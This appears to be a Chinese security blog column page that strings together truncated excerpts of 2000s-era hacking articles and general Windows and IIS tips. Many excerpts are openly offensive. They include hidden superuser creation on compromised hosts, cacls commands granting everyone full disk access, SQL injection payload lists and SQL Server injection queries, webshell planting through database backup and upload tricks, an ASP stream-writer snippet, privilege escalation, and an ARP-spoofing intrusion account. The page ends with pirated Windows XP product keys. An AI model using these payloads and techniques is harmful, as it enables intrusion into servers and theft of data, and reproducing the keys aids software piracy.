蓝法典的专栏

　　http://seclab.mblogger.cn/ http://blog.xfocus.net/ 安全博客 可以看到几个牛人的BLOG　　http://www.rons.net.cn/ 于洪峰　　http://www.hoky.org/ hoky　　http://www.netxeyes.org/ 小榕　　http://seclab.mblogger.cn/xhacker 小叮当　　htt

信息来源：http://wmjie.51.net/swords/一、如何在图形界面建立隐藏的超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好，但是较为复杂，还要用到psu.exe(让程序以系统用户身份运行的程序），如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedi

cacls.exe c: /e /t /g everyone:F          #把c盘设置为everyone可以浏览cacls.exe d: /e /t /g everyone:F       #把d盘设置为everyone可以浏览cacls.exe e: /e /t /g everyone:F          #把e盘设置为everyone可以浏览cacls.exe f: /e /t /

这些文件夹权限给列出来了，你上传asp木马之后，用来提供权限用的。这里主要是给你列个表。好查呀，收藏吧，很有用的。文件或文件夹 用户组 建议权限 继承方式 %AllUsersProfile% 包含了每个用户的桌面以及配置文件的文件夹，通常位于C:/Documents and

 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netm

SERV-U的目录文件结构说明Servudaemon.exe        serv-u的服务程序,主文件Servudaemon.ini        serv-u的配置文件,记录用户信息,服务器参数Seruadmin.exe                serv-u管理界面Servuadmin.ini                serv-u管理界面配置文件Servutray.exe    

Super·Hei和我提起《Backup a shell》这篇文章，就和我说，按照这个文章的方法，有没有办法拿到动网论坛上利用，因为DVBBS7.0即使设置允许上传asp文件，实际上也是无法上传的，既然能够去后台设置允许上传文件类型，那何不利用这个方法去备份一个WebShell，我们发帖子写入特制的WebShell的代码，然后备份一下，不就有WebShell了吗？那能不能用到ACCESS数据库里？

CEO(Chief executive officer)首席执行官 类似总经理、总裁，是企业的法人代表。COO(Chief operating officer)首席运营官 类似常务总经理CFO(Chief financial officer)首席财务官 类似财务总经理CTO(Chief technology officer)首席技术官 类似总工程师CIO(Chief information off

php注射库 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from adm

按照提示存为t.vbs文件，在cmd窗口中输入cscript t.vbs [参数]就可以了。如果想移植到vb下，把wscript.echo替换成debug.pring或者其他的输出函数就可以了function:  list all process or kill one of themparameter:  NameorPID processs name or pidreturn:  

文／图　勇哥儿本文已发表在黑客x档案，转载请注明自从动网7拉开上传漏洞序幕后，各种系统的上传漏洞接踵而来！它们的漏洞原理基本都差不多，利用方法上有略微的差异，简言之可以归纳为几步：先抓包，然后修改文件类型，再在上传路径后加上空格，用十六进制编辑器把空格改成00，最后用NC提交。当然最好还是找一个具体的UpFile文件来自己分析一下，这样有助于提高对漏洞的理解和记忆！本文没有太高深的技术，只不过是把

（本贴是“google技巧大汇集”的修改版，去掉了许多冗余内容） Google（www.Google.com）是一个搜索引擎，由两个斯坦福大学博士生Larry Page与Sergey Brin于1998年9月发明，Google Inc. 于1999年创立。2000年7月份，Google替代Inktomi成为Yahoo公司的搜索引擎，同年9月份，Google成为中国网易公司的搜索引擎。98年至今，G

Microsoft VBScript语法错误(0x800A03E9)-->内存不足Microsoft VBScript语法错误(0x800A03EA)-->语法错误Microsoft VBScript语法错误(0x800A03EB)-->缺少 :Microsoft VBScript语法错误(0x800A03ED)-->缺少

现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友：前言：即是高级技巧，其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入，建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值

Magic Winmail是一款很不错的mail server 软件，深受不少网站的青睐。主要是一些中小的网站。但是在笔者最近的一次渗透中发现，装有改软件的服务器，如果一旦被入侵者得到webshell就可以通过这个软件来提升权限，非常危险。 装有Magic Winmail的服务器会在系统上开启8080端口，对外提供邮件服务。使用过它的人应该知道。这个Magic Winmail服务器支持php脚本解

前言:不是我有意想搞你，而是你们有些过分了，拿着别人的稿子去卖钱，拿着别人的技术装点自己，这也无所谓。你们那种优越感让我不得不提醒你们一下，你们的优越是建立在别人付出之上的。 一、扫描，发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗，进行嗅探。 二、找嗅探主机: C:/>ping hacker.com.cn Pinging hacker.com.cn [211.157.102.

常用的google关键字：foo1 foo2 (也就是关联，比如搜索xx公司 xx美女)operator:foofiletype:123 类型site:foo.com 相对直接看网站更有意思，可以得到许多意外的信息intext:foo intitle: fooltitle 标题哦allinurl:foo 搜索xx网站的所有相关连接。（踩点必备）links:foo 

 来自教主blog声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很大，所以请大家不要对国内的站点做任何具有破坏性的操作。 考虑再三，偶还是决定发出来。此招手段歹毒，利用范围广泛，可以说是只要是有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（不敢把话说满，呵呵，经本人数

出处：中国DOS联盟之联合DOS批处理的介绍扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。==== willsort 编注 =======================================.bat是dos下的批处理文件.cmd是nt内核命令行环境的另一种批处理文件从更广义的角度来看，unix的shell脚本以及其它操作系统甚至应用程序中由外壳

Mix老装一幅正人君子的样子，说写文档，哼哼。。。。无聊，cmd /?后看见好多东西，其中有个好玩的： ******************* 如果 /D 未在命令行上被指定，当 CMD.EXE 开始时，它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在，这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft

我们来看看如果让一个程序随另一个程序的启动而启动。一个典型的应用是：让杀毒软件随着网络连接打开而自动运行，关闭网络连接时，杀毒软件自动退出。随时关闭网络连接还有节省网费、免遭攻击的好处。实现方法如下：步骤1 确定相程序的位置　　默认情况下，网络连接软件PPPoEWin.exe和江民杀毒软件KvXP.kxp(它的扩展名虽不是.exe或.com，但还是能运行)分别位于 C:/Windows/syste

通杀Windows用户态进程的命令c:>ntsd -c q -p PID 　　只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的，最后那个是Win32子系统，ntsd本身需要它。ntsd从2000开始就是系统自带的用户态调试工具。被调试器附着(attach)的进程会随调试器一起退出，所以可以用来在命令行下终止进程。使用ntsd自动就获得了debug权限，从而能杀掉大部

一、其实WINDOWS　XP这个NTLDR文件丢失有个最简便的解决办法，不需要任何其它工具，就地起死回生。1、用其它任何方式启动电脑。2、用DIR　NTLDR　/S命令从备份文件中找出这个文件。路径比较长，比照抄下就行,复制到C盘根目录下。3、关键是写入硬盘，不能COPY完就了事，必须执行DEBUG　NTLDR命令。命令行中执行W命令写入，Q命令退出。这样才能保证真正写入硬盘。4、重新启动。怎

如何从命令提示符执行 Internet 信息服务 (IIS) 中的管理任务。有几种工具可以帮助管理任务的执行。本文中，这些任务划分为三个独立的任务组；不过，所有任务都是由驱动器盘符:/Inetpub/AdminScripts 文件夹中 Administrator 组的组成员用户执行的。 备注：要打开命令提示符以执行本文介绍的任何任务，请按下列步骤操作： 单击开始，单击运行，键入 cmd，然后单击确

文章来源：邪恶八进制 中国文章作者：恶猫[E.S.T] (EvilCat[E.S.T])在入侵的时候有时会遇到明明对方开放了类似于3389终端这样的端口，用终端连接器连接却连不上，说明对方可能做了TCP/IP筛选，大家都知道解除TCP/IP筛选的方法是修改注册表，在对方的shell中导出注册表然后修改,再将修改好的文件导入，然后还要重启对方，这样比较麻烦，不如写个程序，并将程序传入服务器，点击一下

摘要FTP命令是Internet用户使用最频繁的命令之一，不论是在DOS还是UNIX操作系统下使用 FTP，都会遇到大量的FTP内部命令。熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。(2005-01-18 10:27:37)By lanf, 出处：http://tech.ccidnet.com/pub/article/c302_a201907_p1.html作者：Lin

Net User命令是一个DOS命令，必须在Windows XP下的MS-DOS模式下运行，所以首先要进入MS-DOS模式：选择“开始”菜单的“附件”选项的子选项“命令提示符”，或在“开始”菜单的“运行”选项（快捷键为Win+R）中输入“cmd.exe”，进入MS-DOS模式。以下功能都基于此模式下。 建立一个普通新用户 在MS-DOS提示符中输入如下命令：“net user john 123 /

TCP/IP筛选在注册表里有三处，分别是：HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/TcpipHKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/TcpipHKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip分别用regedit -e

信息来源：冰点论坛首先找一个没有固顶帖子的版面，自己找找去。一个论坛总不可能哪个版块都有固顶吧？点进去看看有没有固定帖子什么的，我是自己架设的平台做测试的。当然要"符合"漏洞条件了。以前台管理员的身份登陆，也不一定要用前台管理员进去，一个斑竹就行，能固顶帖子就行了，然后随便发个帖子。然后点下设置固顶如图screen.width-461) window.open(http://qmsqlwebsh

Win 2003中提高FSO的安全性文章来源：http://soft.yesky.com ASP提供了强大的文件系统访问能力，可以对服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作，这给学校网站的安全带来巨大的威胁。现在很多校园主机都遭受过FSO木马的侵扰。但是禁用FSO组件后，引起的后果就是所有利用这个组件的ASP程序将无法运行，无法满足客户的需求。如何既允许FileSystemObje

公告插入==========================================================在本地建立个提交文件 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("hackbin") lP.SaveToFile

简单突破权限设置漏洞挂马今天我要说一下权限设置的问题，有时候我们拿到了一个shell,但权限太低，只能在拿到sehll的站点的目录瞎逛，对于我这样喜欢在服务器站点挂马的人来说太痛苦了。拿一个例子吧 ，比如asp注入，动网，动感，动易，尘缘等等漏洞，好多的，反正不管怎样我们现在有个shell当我们取得一个webshell时候，主要要做的就是看看有什末权限,来提升权限，有权限才能知道个个盘都有什末东东

作者：阿才 来源: http://www.pconline.com.cn在一个使用TCP/IP协议的网络中，每一台计算机都必须至少有一个IP地址，才能与其他计算机连接通信。为了便于统一规划和管理网络中的IP地址，DHCP（Dynamic Host Configure Protocol，动态主机配置协议）应运而生了。这种网络服务有利于对校园网络中的客户机IP地址进行有效管理，而不需要一个一个手动

ps:速度超快，800多K/s吧！还不限制线程！偶开了20个线程！^_^VS.NET 是一种软件开发工具包(修正了以前的所有错误)，它也是微软实现其.NET 战略的核心组件之一。它是一种数字网络时代应用程序理想的开发工具，可以使软件开发人员更好地科学管理软件开发过程，提高软件开发效率。同时它一开始就为XML的Web 服务创建了开发环境，它的特性使开发人员可以增加开发速度、快速设计功能全面的 Web

如何使您的WEB服务器支持WAP数据发送? 1. 个人服务器情况下默认的WEB服务器是不支持WAP数据发送的, 但是, 只需要轻松配置一下服务器对应的MIME格式, 就可轻松升级! 具体做法如下: A. IIS 服务器 设定方式: 打开(开始)-->(程序)-->(WindowsNT4.0 Option Pack)--> (Microsoft Internet Information Server

AIX 3 /etc/security/passwd ! 　　or /tcb/auth/files/ 　　of username>/ A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/

一次真实的入侵-------记对一足球推荐站点的渗透来源: http://www.17nc.com/由于某些原因！我们要对某足球推荐站点--www.******.com进行渗透，首先当然是踩点了。先用扫描器扫扫。看开什么服务看了下。开21，80，554端口。FTP是serv-u，IIS是6.0的，还有554，嘿嘿，这个服务是什么我忘了。只知道可以溢出，试了下。失败！~！~1没有办法，在回来到他的站

文/图　　臭要饭的 目前网上很流行SQL INJECTION 漏洞，也就是我们通常所说的SQL注入漏洞，我们利用这类漏洞可以跨表、跨库查询数据库信息，以及通过论坛来上传文件从而得到主机WebShell（这些都是一些很通常的手法，黑防原来也介绍得比较详细）。 前段时间我对一大型音乐收费网站进行安全测试，结果我利用纯脚本技术，拿到了系统管理员权限。所以，今天我就为大家介绍一下全部经过和我的具体思路分析

Windows XP专业版最新注册码HTXH6-2JJC4-CDB6C-X38B4-C3GF3RT4H2-8WYHG-QKK6K-WWHJ2-9427XDYPVX-43TRT-YDBGB-7YQJX-CWXW7HGM7B-YF7T7-8R7RF-Y6RPY-XTQ77Windows XP专业版最新注册码DJQJB-PC83T-FTGJC-CQTCK-RJD8DVMMBM-8WK8W-H44YH-3